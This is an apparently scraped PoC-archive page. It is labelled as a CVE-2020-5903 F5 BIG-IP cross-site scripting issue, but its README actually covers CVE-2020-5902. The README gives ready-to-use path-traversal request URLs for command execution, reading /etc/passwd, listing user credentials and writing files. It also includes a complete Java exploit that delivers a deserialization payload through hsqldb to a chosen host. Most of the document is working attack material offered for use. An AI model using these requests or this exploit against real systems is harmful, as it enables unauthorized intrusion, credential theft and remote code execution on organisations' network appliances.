CVE-2020-5903 PoC — F5 BIG-IP 跨站脚本漏洞

Source

https://github.com/ltvthang/CVE-2020-5903

Associated Vulnerability

Title:F5 BIG-IP 跨站脚本漏洞 (CVE-2020-5903)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP中的配置工具存在跨站脚本漏洞。攻击者可利用该漏洞在当前登录用户的上下文中执行任意JavaScript代码。以下产品及版本受到影响：F5 BIG-IP 15.0.0版本至15.1.0版本，14.1.0版本至14.1.2版本，13.1.0版本至13.1.3版本，12.1.0版本至12.1.5版本。

Description

CVE-2020-5902

Readme

# CVE-2020-5902
## RCE
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/WWWWW&content=id
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/WWWWW

## ysoserial
```
/*
 Exploit Title: F5 BIG-IP Remote Code Execution
 Date: 2020-07-06
 Authors: Charles Dardaman of Critical Start, TeamARES
                  Rich Mirch of Critical Start, TeamARES
 CVE: CVE-2020-5902

 Requirements:
   Java JDK
   hsqldb.jar 1.8
   ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
*/

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.Statement;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.io.IOException;
import org.hsqldb.lib.StringConverter;

public class f5RCE {

	public static void main(String[] args) {
		Connection connection;
		Statement statement;

		if(args.length != 2) {
			System.err.println("\nUsage: <hostname> <payload.txt>\n");
			System.exit(1);
		}
		String server = args[0];
		String pfile = args[1];
		String payload = null;

		try {
			payload = new String(Files.readAllBytes(Paths.get(pfile)));
			payload = payload.replaceAll("(\\n|\\r)","");
		} catch (IOException e) {
			e.printStackTrace();
		}

		String dburl = "jdbc:hsqldb:https://" + server +
                               ":443/tmui/login.jsp/..%3b/hsqldb/";

		System.out.println("Connecting to " + server);
		try {
			Class.forName("org.hsqldb.jdbcDriver");
			connection = DriverManager.getConnection(dburl, "sa","");
			statement = connection.createStatement();
			statement.execute("call \"java.lang.System.setProperty\"('org.apache.commons.collections.enableUnsafeSerialization','true')");
			statement.execute("call \"org.hsqldb.util.ScriptTool.main\"('" + payload +"');");
		} catch (java.sql.SQLException sqle) {
			// ignore java.sql.SQLException: S1000
			// General error java.lang.IllegalArgumentException: argument type mismatch
			if(sqle.getSQLState().equals("S1000") && sqle.getErrorCode() == 40) {
				System.out.println("Payload executed");
			} else {
				System.out.println("Unexpected SQL error");
				sqle.printStackTrace();
			}
			return;
		}
		catch (ClassNotFoundException cne) {
			System.err.println("Error loading db driver");
			cne.printStackTrace();
			return;
		}
	}
}

```

## Read password
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user

## Read file
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

## Write file
/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/WWWWW&content=id

## List file
/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

## Orange Tsai-Breaking-Parser-Logic
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf

File Snapshot


 [4.0K]  /data/pocs/c013a5910a374d23e25390fdaa40097d299ee00b
└── [3.0K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!